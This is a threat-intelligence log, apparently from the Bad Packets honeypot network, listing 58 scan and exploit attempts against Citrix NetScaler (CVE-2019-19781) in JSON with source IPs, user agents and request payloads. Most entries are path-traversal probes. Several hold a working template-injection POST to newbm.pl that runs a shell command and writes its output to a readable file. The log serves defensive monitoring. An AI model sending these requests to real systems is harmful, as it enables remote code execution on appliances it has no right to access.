internetweather

CVE-2019-19781 scans detected by Bad Packets – last 24 hours

Jan 16th, 2020
  1. {
  2.   "count": 58,
  3.   "next": null,
  4.   "previous": null,
  5.   "results": [
  6.     {
  7.       "source_ip_address": "45.148.10.184",
  8.       "country": "NL",
  9.       "user_agent": "Mozilla/5.0 zgrab/0.x",
  10.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  11.       "post_data": "",
  12.       "target_port": 443,
  13.       "protocol": "tcp",
  14.       "tags": [
  15.         {
  16.           "cve": "CVE-2019-19781",
  17.           "category": "Platform",
  18.           "description": "Citrix NetScaler Gateway Exploit"
  19.         }
  20.       ],
  21.       "event_count": 25,
  22.       "first_seen": "2020-01-16T04:12:45Z",
  23.       "last_seen": "2020-01-17T03:48:33Z"
  24.     },
  25.     {
  26.       "source_ip_address": "5.101.0.209",
  27.       "country": "RU",
  28.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36",
  29.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  30.       "post_data": "",
  31.       "target_port": 443,
  32.       "protocol": "tcp",
  33.       "tags": [
  34.         {
  35.           "cve": "CVE-2019-19781",
  36.           "category": "Platform",
  37.           "description": "Citrix NetScaler Gateway Exploit"
  38.         }
  39.       ],
  40.       "event_count": 1813,
  41.       "first_seen": "2020-01-12T12:16:24Z",
  42.       "last_seen": "2020-01-17T02:42:38Z"
  43.     },
  44.     {
  45.       "source_ip_address": "74.63.222.154",
  46.       "country": "US",
  47.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  48.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  49.       "post_data": "",
  50.       "target_port": 80,
  51.       "protocol": "tcp",
  52.       "tags": [
  53.         {
  54.           "cve": "CVE-2019-19781",
  55.           "category": "Platform",
  56.           "description": "Citrix NetScaler Gateway Exploit"
  57.         }
  58.       ],
  59.       "event_count": 9,
  60.       "first_seen": "2020-01-15T19:59:58Z",
  61.       "last_seen": "2020-01-17T02:39:53Z"
  62.     },
  63.     {
  64.       "source_ip_address": "71.6.202.253",
  65.       "country": "US",
  66.       "user_agent": "Research Only, don't at me greynoise",
  67.       "payload": "GET /vpn/../vpns/ HTTP/1.1",
  68.       "post_data": "",
  69.       "target_port": 443,
  70.       "protocol": "tcp",
  71.       "tags": [
  72.         {
  73.           "cve": "CVE-2019-19781",
  74.           "category": "Platform",
  75.           "description": "Citrix NetScaler Gateway Scan"
  76.         }
  77.       ],
  78.       "event_count": 42,
  79.       "first_seen": "2020-01-16T21:49:29Z",
  80.       "last_seen": "2020-01-17T01:10:46Z"
  81.     },
  82.     {
  83.       "source_ip_address": "69.162.68.54",
  84.       "country": "US",
  85.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  86.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  87.       "post_data": "",
  88.       "target_port": 443,
  89.       "protocol": "tcp",
  90.       "tags": [
  91.         {
  92.           "cve": "CVE-2019-19781",
  93.           "category": "Platform",
  94.           "description": "Citrix NetScaler Gateway Exploit"
  95.         }
  96.       ],
  97.       "event_count": 1,
  98.       "first_seen": "2020-01-17T00:55:44Z",
  99.       "last_seen": "2020-01-17T00:55:44Z"
  100.     },
  101.     {
  102.       "source_ip_address": "69.162.106.70",
  103.       "country": "US",
  104.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  105.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  106.       "post_data": "",
  107.       "target_port": 443,
  108.       "protocol": "tcp",
  109.       "tags": [
  110.         {
  111.           "cve": "CVE-2019-19781",
  112.           "category": "Platform",
  113.           "description": "Citrix NetScaler Gateway Exploit"
  114.         }
  115.       ],
  116.       "event_count": 1,
  117.       "first_seen": "2020-01-16T18:17:13Z",
  118.       "last_seen": "2020-01-16T18:17:13Z"
  119.     },
  120.     {
  121.       "source_ip_address": "69.162.106.70",
  122.       "country": "US",
  123.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  124.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  125.       "post_data": "",
  126.       "target_port": 80,
  127.       "protocol": "tcp",
  128.       "tags": [
  129.         {
  130.           "cve": "CVE-2019-19781",
  131.           "category": "Platform",
  132.           "description": "Citrix NetScaler Gateway Exploit"
  133.         }
  134.       ],
  135.       "event_count": 4,
  136.       "first_seen": "2020-01-16T17:04:57Z",
  137.       "last_seen": "2020-01-16T17:04:57Z"
  138.     },
  139.     {
  140.       "source_ip_address": "74.63.213.118",
  141.       "country": "US",
  142.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  143.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  144.       "post_data": "",
  145.       "target_port": 80,
  146.       "protocol": "tcp",
  147.       "tags": [
  148.         {
  149.           "cve": "CVE-2019-19781",
  150.           "category": "Platform",
  151.           "description": "Citrix NetScaler Gateway Exploit"
  152.         }
  153.       ],
  154.       "event_count": 1,
  155.       "first_seen": "2020-01-16T16:08:47Z",
  156.       "last_seen": "2020-01-16T16:08:47Z"
  157.     },
  158.     {
  159.       "source_ip_address": "74.63.246.42",
  160.       "country": "US",
  161.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  162.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  163.       "post_data": "",
  164.       "target_port": 80,
  165.       "protocol": "tcp",
  166.       "tags": [
  167.         {
  168.           "cve": "CVE-2019-19781",
  169.           "category": "Platform",
  170.           "description": "Citrix NetScaler Gateway Exploit"
  171.         }
  172.       ],
  173.       "event_count": 59,
  174.       "first_seen": "2020-01-16T14:25:02Z",
  175.       "last_seen": "2020-01-16T14:25:02Z"
  176.     },
  177.     {
  178.       "source_ip_address": "216.144.247.254",
  179.       "country": "US",
  180.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  181.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  182.       "post_data": "",
  183.       "target_port": 443,
  184.       "protocol": "tcp",
  185.       "tags": [
  186.         {
  187.           "cve": "CVE-2019-19781",
  188.           "category": "Platform",
  189.           "description": "Citrix NetScaler Gateway Exploit"
  190.         }
  191.       ],
  192.       "event_count": 5,
  193.       "first_seen": "2020-01-16T11:53:54Z",
  194.       "last_seen": "2020-01-16T13:34:10Z"
  195.     },
  196.     {
  197.       "source_ip_address": "63.143.57.26",
  198.       "country": "US",
  199.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  200.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  201.       "post_data": "",
  202.       "target_port": 80,
  203.       "protocol": "tcp",
  204.       "tags": [
  205.         {
  206.           "cve": "CVE-2019-19781",
  207.           "category": "Platform",
  208.           "description": "Citrix NetScaler Gateway Exploit"
  209.         }
  210.       ],
  211.       "event_count": 1,
  212.       "first_seen": "2020-01-16T13:02:18Z",
  213.       "last_seen": "2020-01-16T13:02:18Z"
  214.     },
  215.     {
  216.       "source_ip_address": "69.162.126.62",
  217.       "country": "US",
  218.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  219.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  220.       "post_data": "",
  221.       "target_port": 443,
  222.       "protocol": "tcp",
  223.       "tags": [
  224.         {
  225.           "cve": "CVE-2019-19781",
  226.           "category": "Platform",
  227.           "description": "Citrix NetScaler Gateway Exploit"
  228.         }
  229.       ],
  230.       "event_count": 4,
  231.       "first_seen": "2020-01-16T10:41:33Z",
  232.       "last_seen": "2020-01-16T10:41:33Z"
  233.     },
  234.     {
  235.       "source_ip_address": "63.143.53.142",
  236.       "country": "US",
  237.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  238.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  239.       "post_data": "",
  240.       "target_port": 443,
  241.       "protocol": "tcp",
  242.       "tags": [
  243.         {
  244.           "cve": "CVE-2019-19781",
  245.           "category": "Platform",
  246.           "description": "Citrix NetScaler Gateway Exploit"
  247.         }
  248.       ],
  249.       "event_count": 2,
  250.       "first_seen": "2020-01-16T10:08:55Z",
  251.       "last_seen": "2020-01-16T10:08:55Z"
  252.     },
  253.     {
  254.       "source_ip_address": "216.245.216.22",
  255.       "country": "US",
  256.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  257.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  258.       "post_data": "",
  259.       "target_port": 80,
  260.       "protocol": "tcp",
  261.       "tags": [
  262.         {
  263.           "cve": "CVE-2019-19781",
  264.           "category": "Platform",
  265.           "description": "Citrix NetScaler Gateway Exploit"
  266.         }
  267.       ],
  268.       "event_count": 85,
  269.       "first_seen": "2020-01-16T10:02:30Z",
  270.       "last_seen": "2020-01-16T10:02:30Z"
  271.     },
  272.     {
  273.       "source_ip_address": "69.162.68.54",
  274.       "country": "US",
  275.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  276.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  277.       "post_data": "",
  278.       "target_port": 80,
  279.       "protocol": "tcp",
  280.       "tags": [
  281.         {
  282.           "cve": "CVE-2019-19781",
  283.           "category": "Platform",
  284.           "description": "Citrix NetScaler Gateway Exploit"
  285.         }
  286.       ],
  287.       "event_count": 1,
  288.       "first_seen": "2020-01-16T06:49:38Z",
  289.       "last_seen": "2020-01-16T06:49:38Z"
  290.     },
  291.     {
  292.       "source_ip_address": "74.63.253.190",
  293.       "country": "US",
  294.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  295.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  296.       "post_data": "",
  297.       "target_port": 443,
  298.       "protocol": "tcp",
  299.       "tags": [
  300.         {
  301.           "cve": "CVE-2019-19781",
  302.           "category": "Platform",
  303.           "description": "Citrix NetScaler Gateway Exploit"
  304.         }
  305.       ],
  306.       "event_count": 1,
  307.       "first_seen": "2020-01-16T05:50:04Z",
  308.       "last_seen": "2020-01-16T05:50:04Z"
  309.     },
  310.     {
  311.       "source_ip_address": "5.101.0.209",
  312.       "country": "RU",
  313.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36",
  314.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  315.       "post_data": "",
  316.       "target_port": 80,
  317.       "protocol": "tcp",
  318.       "tags": [
  319.         {
  320.           "cve": "CVE-2019-19781",
  321.           "category": "Platform",
  322.           "description": "Citrix NetScaler Gateway Exploit"
  323.         }
  324.       ],
  325.       "event_count": 1943,
  326.       "first_seen": "2020-01-12T13:20:04Z",
  327.       "last_seen": "2020-01-16T04:56:29Z"
  328.     },
  329.     {
  330.       "source_ip_address": "107.173.214.153",
  331.       "country": "US",
  332.       "user_agent": "curl/7.67.0",
  333.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  334.       "post_data": "",
  335.       "target_port": 443,
  336.       "protocol": "tcp",
  337.       "tags": [
  338.         {
  339.           "cve": "CVE-2019-19781",
  340.           "category": "Platform",
  341.           "description": "Citrix NetScaler Gateway Exploit"
  342.         }
  343.       ],
  344.       "event_count": 4,
  345.       "first_seen": "2020-01-16T01:10:53Z",
  346.       "last_seen": "2020-01-16T01:10:53Z"
  347.     },
  348.     {
  349.       "source_ip_address": "74.63.192.130",
  350.       "country": "US",
  351.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  352.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  353.       "post_data": "",
  354.       "target_port": 80,
  355.       "protocol": "tcp",
  356.       "tags": [
  357.         {
  358.           "cve": "CVE-2019-19781",
  359.           "category": "Platform",
  360.           "description": "Citrix NetScaler Gateway Exploit"
  361.         }
  362.       ],
  363.       "event_count": 1,
  364.       "first_seen": "2020-01-15T20:44:38Z",
  365.       "last_seen": "2020-01-15T20:44:38Z"
  366.     },
  367.     {
  368.       "source_ip_address": "45.148.10.184",
  369.       "country": "NL",
  370.       "user_agent": "Patch your Citrix !",
  371.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  372.       "post_data": "",
  373.       "target_port": 443,
  374.       "protocol": "tcp",
  375.       "tags": [
  376.         {
  377.           "cve": "CVE-2019-19781",
  378.           "category": "Platform",
  379.           "description": "Citrix NetScaler Gateway Exploit"
  380.         }
  381.       ],
  382.       "event_count": 2,
  383.       "first_seen": "2020-01-15T14:10:59Z",
  384.       "last_seen": "2020-01-15T17:21:47Z"
  385.     },
  386.     {
  387.       "source_ip_address": "69.162.123.62",
  388.       "country": "US",
  389.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  390.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  391.       "post_data": "",
  392.       "target_port": 80,
  393.       "protocol": "tcp",
  394.       "tags": [
  395.         {
  396.           "cve": "CVE-2019-19781",
  397.           "category": "Platform",
  398.           "description": "Citrix NetScaler Gateway Exploit"
  399.         }
  400.       ],
  401.       "event_count": 2,
  402.       "first_seen": "2020-01-15T14:02:38Z",
  403.       "last_seen": "2020-01-15T16:35:25Z"
  404.     },
  405.     {
  406.       "source_ip_address": "83.97.20.145",
  407.       "country": "RO",
  408.       "user_agent": "Patch your Citrix !",
  409.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  410.       "post_data": "",
  411.       "target_port": 443,
  412.       "protocol": "tcp",
  413.       "tags": [
  414.         {
  415.           "cve": "CVE-2019-19781",
  416.           "category": "Platform",
  417.           "description": "Citrix NetScaler Gateway Exploit"
  418.         }
  419.       ],
  420.       "event_count": 123,
  421.       "first_seen": "2020-01-15T03:47:01Z",
  422.       "last_seen": "2020-01-15T10:45:56Z"
  423.     },
  424.     {
  425.       "source_ip_address": "69.162.126.62",
  426.       "country": "US",
  427.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  428.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  429.       "post_data": "",
  430.       "target_port": 80,
  431.       "protocol": "tcp",
  432.       "tags": [
  433.         {
  434.           "cve": "CVE-2019-19781",
  435.           "category": "Platform",
  436.           "description": "Citrix NetScaler Gateway Exploit"
  437.         }
  438.       ],
  439.       "event_count": 1,
  440.       "first_seen": "2020-01-15T10:11:40Z",
  441.       "last_seen": "2020-01-15T10:11:40Z"
  442.     },
  443.     {
  444.       "source_ip_address": "193.57.40.46",
  445.       "country": "UA",
  446.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36",
  447.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  448.       "post_data": "",
  449.       "target_port": 443,
  450.       "protocol": "tcp",
  451.       "tags": [
  452.         {
  453.           "cve": "CVE-2019-19781",
  454.           "category": "Platform",
  455.           "description": "Citrix NetScaler Gateway Exploit"
  456.         }
  457.       ],
  458.       "event_count": 503,
  459.       "first_seen": "2020-01-12T22:25:24Z",
  460.       "last_seen": "2020-01-15T09:22:21Z"
  461.     },
  462.     {
  463.       "source_ip_address": "82.217.91.74",
  464.       "country": "NL",
  465.       "user_agent": "curl/7.67.0",
  466.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  467.       "post_data": "",
  468.       "target_port": 443,
  469.       "protocol": "tcp",
  470.       "tags": [
  471.         {
  472.           "cve": "CVE-2019-19781",
  473.           "category": "Platform",
  474.           "description": "Citrix NetScaler Gateway Exploit"
  475.         }
  476.       ],
  477.       "event_count": 7,
  478.       "first_seen": "2020-01-15T08:01:57Z",
  479.       "last_seen": "2020-01-15T08:50:17Z"
  480.     },
  481.     {
  482.       "source_ip_address": "185.150.9.193",
  483.       "country": "CH",
  484.       "user_agent": "",
  485.       "payload": "GET /vpn/js/../../vpns/cfg/smb.conf HTTP/1.1",
  486.       "post_data": "",
  487.       "target_port": 443,
  488.       "protocol": "tcp",
  489.       "tags": [
  490.         {
  491.           "cve": "CVE-2019-19781",
  492.           "category": "Platform",
  493.           "description": "Citrix NetScaler Gateway Exploit"
  494.         }
  495.       ],
  496.       "event_count": 10,
  497.       "first_seen": "2020-01-15T08:48:34Z",
  498.       "last_seen": "2020-01-15T08:48:34Z"
  499.     },
  500.     {
  501.       "source_ip_address": "185.150.9.193",
  502.       "country": "CH",
  503.       "user_agent": "",
  504.       "payload": "GET /vpn/js/../../vpns/cfg/smb.conf HTTP/1.1",
  505.       "post_data": "",
  506.       "target_port": 80,
  507.       "protocol": "tcp",
  508.       "tags": [
  509.         {
  510.           "cve": "CVE-2019-19781",
  511.           "category": "Platform",
  512.           "description": "Citrix NetScaler Gateway Exploit"
  513.         }
  514.       ],
  515.       "event_count": 10,
  516.       "first_seen": "2020-01-15T08:14:12Z",
  517.       "last_seen": "2020-01-15T08:14:12Z"
  518.     },
  519.     {
  520.       "source_ip_address": "74.63.253.190",
  521.       "country": "US",
  522.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  523.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  524.       "post_data": "",
  525.       "target_port": 80,
  526.       "protocol": "tcp",
  527.       "tags": [
  528.         {
  529.           "cve": "CVE-2019-19781",
  530.           "category": "Platform",
  531.           "description": "Citrix NetScaler Gateway Exploit"
  532.         }
  533.       ],
  534.       "event_count": 1,
  535.       "first_seen": "2020-01-15T03:18:44Z",
  536.       "last_seen": "2020-01-15T03:18:44Z"
  537.     },
  538.     {
  539.       "source_ip_address": "74.63.246.42",
  540.       "country": "US",
  541.       "user_agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  542.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  543.       "post_data": "",
  544.       "target_port": 443,
  545.       "protocol": "tcp",
  546.       "tags": [
  547.         {
  548.           "cve": "CVE-2019-19781",
  549.           "category": "Platform",
  550.           "description": "Citrix NetScaler Gateway Exploit"
  551.         }
  552.       ],
  553.       "event_count": 6,
  554.       "first_seen": "2020-01-14T23:16:27Z",
  555.       "last_seen": "2020-01-14T23:16:27Z"
  556.     },
  557.     {
  558.       "source_ip_address": "54.38.157.11",
  559.       "country": "DE",
  560.       "user_agent": "curl/7.67.0",
  561.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  562.       "post_data": "",
  563.       "target_port": 443,
  564.       "protocol": "tcp",
  565.       "tags": [
  566.         {
  567.           "cve": "CVE-2019-19781",
  568.           "category": "Platform",
  569.           "description": "Citrix NetScaler Gateway Exploit"
  570.         }
  571.       ],
  572.       "event_count": 47,
  573.       "first_seen": "2020-01-13T03:13:30Z",
  574.       "last_seen": "2020-01-14T15:33:33Z"
  575.     },
  576.     {
  577.       "source_ip_address": "185.234.216.20",
  578.       "country": "IE",
  579.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0",
  580.       "payload": "GET /vpns/cfg/smb.conf HTTP/1.1",
  581.       "post_data": "",
  582.       "target_port": 443,
  583.       "protocol": "tcp",
  584.       "tags": [
  585.         {
  586.           "cve": "CVE-2019-19781",
  587.           "category": "Platform",
  588.           "description": "Citrix NetScaler Gateway Scan"
  589.         }
  590.       ],
  591.       "event_count": 293,
  592.       "first_seen": "2020-01-11T13:15:51Z",
  593.       "last_seen": "2020-01-14T11:11:44Z"
  594.     },
  595.     {
  596.       "source_ip_address": "185.234.216.20",
  597.       "country": "IE",
  598.       "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0",
  599.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  600.       "post_data": "",
  601.       "target_port": 443,
  602.       "protocol": "tcp",
  603.       "tags": [
  604.         {
  605.           "cve": "CVE-2019-19781",
  606.           "category": "Platform",
  607.           "description": "Citrix NetScaler Gateway Exploit"
  608.         }
  609.       ],
  610.       "event_count": 51,
  611.       "first_seen": "2020-01-13T19:01:01Z",
  612.       "last_seen": "2020-01-14T01:27:27Z"
  613.     },
  614.     {
  615.       "source_ip_address": "82.102.16.220",
  616.       "country": "DE",
  617.       "user_agent": "curl/7.58.0",
  618.       "payload": "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1",
  619.       "post_data": "",
  620.       "target_port": 443,
  621.       "protocol": "tcp",
  622.       "tags": [
  623.         {
  624.           "cve": "CVE-2019-19781",
  625.           "category": "Platform",
  626.           "description": "Citrix NetScaler Gateway Exploit"
  627.         }
  628.       ],
  629.       "event_count": 5,
  630.       "first_seen": "2020-01-10T00:07:56Z",
  631.       "last_seen": "2020-01-13T13:16:31Z"
  632.     },
  633.     {
  634.       "source_ip_address": "156.17.191.239",
  635.       "country": "PL",
  636.       "user_agent": "curl/7.52.1",
  637.       "payload": "GET /vpn/../vpns/portal/8a7QBjTqX1CymonteGcsdiz8gX7Hzcvo.xml HTTP/1.1",
  638.       "post_data": "",
  639.       "target_port": 2087,
  640.       "protocol": "tcp",
  641.       "tags": [
  642.         {
  643.           "cve": "CVE-2019-19781",
  644.           "category": "Platform",
  645.           "description": "Citrix NetScaler Gateway Exploit"
  646.         }
  647.       ],
  648.       "event_count": 2,
  649.       "first_seen": "2020-01-12T08:45:42Z",
  650.       "last_seen": "2020-01-12T08:45:43Z"
  651.     },
  652.     {
  653.       "source_ip_address": "156.17.191.239",
  654.       "country": "PL",
  655.       "user_agent": "curl/7.52.1",
  656.       "payload": "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1",
  657.       "post_data": "\"url=https://example.com\\x5C&title=[% template.new({'BLOCK'='exec(\\x5C'uname -a | tee /netscaler/portal/templates/8a7QBjTqX1CymonteGcsdiz8gX7Hzcvo.xml\\x5C');'}) %]\\x5C&desc=test\\x5C&UI_inuse=RfWeb\"",
  658.       "target_port": 2087,
  659.       "protocol": "tcp",
  660.       "tags": [
  661.         {
  662.           "cve": "CVE-2019-19781",
  663.           "category": "Platform",
  664.           "description": "Citrix NetScaler Gateway Exploit"
  665.         }
  666.       ],
  667.       "event_count": 1,
  668.       "first_seen": "2020-01-12T08:45:41Z",
  669.       "last_seen": "2020-01-12T08:45:41Z"
  670.     },
  671.     {
  672.       "source_ip_address": "156.17.191.239",
  673.       "country": "PL",
  674.       "user_agent": "curl/7.52.1",
  675.       "payload": "GET /vpn/../vpns/portal/cPnoyZcOkABbMPC8WNCzoFeL12pzqgCJ.xml HTTP/1.1",
  676.       "post_data": "",
  677.       "target_port": 8443,
  678.       "protocol": "tcp",
  679.       "tags": [
  680.         {
  681.           "cve": "CVE-2019-19781",
  682.           "category": "Platform",
  683.           "description": "Citrix NetScaler Gateway Exploit"
  684.         }
  685.       ],
  686.       "event_count": 2,
  687.       "first_seen": "2020-01-12T08:23:19Z",
  688.       "last_seen": "2020-01-12T08:23:20Z"
  689.     },
  690.     {
  691.       "source_ip_address": "156.17.191.239",
  692.       "country": "PL",
  693.       "user_agent": "curl/7.52.1",
  694.       "payload": "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1",
  695.       "post_data": "\"url=https://example.com\\x5C&title=[% template.new({'BLOCK'='exec(\\x5C'uname -a | tee /netscaler/portal/templates/cPnoyZcOkABbMPC8WNCzoFeL12pzqgCJ.xml\\x5C');'}) %]\\x5C&desc=test\\x5C&UI_inuse=RfWeb\"",
  696.       "target_port": 8443,
  697.       "protocol": "tcp",
  698.       "tags": [
  699.         {
  700.           "cve": "CVE-2019-19781",
  701.           "category": "Platform",
  702.           "description": "Citrix NetScaler Gateway Exploit"
  703.         }
  704.       ],
  705.       "event_count": 1,
  706.       "first_seen": "2020-01-12T08:23:19Z",
  707.       "last_seen": "2020-01-12T08:23:19Z"
  708.     },
  709.     {
  710.       "source_ip_address": "156.17.191.239",
  711.       "country": "PL",
  712.       "user_agent": "curl/7.52.1",
  713.       "payload": "GET /vpn/../vpns/portal/v0CZSNQJc3fjDfGuFcV6iFydXMz6lRZA.xml HTTP/1.1",
  714.       "post_data": "",
  715.       "target_port": 2083,
  716.       "protocol": "tcp",
  717.       "tags": [
  718.         {
  719.           "cve": "CVE-2019-19781",
  720.           "category": "Platform",
  721.           "description": "Citrix NetScaler Gateway Exploit"
  722.         }
  723.       ],
  724.       "event_count": 2,
  725.       "first_seen": "2020-01-12T08:01:34Z",
  726.       "last_seen": "2020-01-12T08:01:35Z"
  727.     },
  728.     {
  729.       "source_ip_address": "156.17.191.239",
  730.       "country": "PL",
  731.       "user_agent": "curl/7.52.1",
  732.       "payload": "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1",
  733.       "post_data": "\"url=https://example.com\\x5C&title=[% template.new({'BLOCK'='exec(\\x5C'uname -a | tee /netscaler/portal/templates/v0CZSNQJc3fjDfGuFcV6iFydXMz6lRZA.xml\\x5C');'}) %]\\x5C&desc=test\\x5C&UI_inuse=RfWeb\"",
  734.       "target_port": 2083,
  735.       "protocol": "tcp",
  736.       "tags": [
  737.         {
  738.           "cve": "CVE-2019-19781",
  739.           "category": "Platform",
  740.           "description": "Citrix NetScaler Gateway Exploit"
  741.         }
  742.       ],
  743.       "event_count": 1,
  744.       "first_seen": "2020-01-12T08:01:33Z",
  745.       "last_seen": "2020-01-12T08:01:33Z"
  746.     },
  747.     {
  748.       "source_ip_address": "156.17.191.239",
  749.       "country": "PL",
  750.       "user_agent": "curl/7.52.1",
  751.       "payload": "GET /vpn/../vpns/portal/8Zy8VgjuOS2PGMp5adl52pIRQfCwL0A7.xml HTTP/1.1",
  752.       "post_data": "",
  753.       "target_port": 443,
  754.       "protocol": "tcp",
  755.       "tags": [
  756.         {
  757.           "cve": "CVE-2019-19781",
  758.           "category": "Platform",
  759.           "description": "Citrix NetScaler Gateway Exploit"
  760.         }
  761.       ],
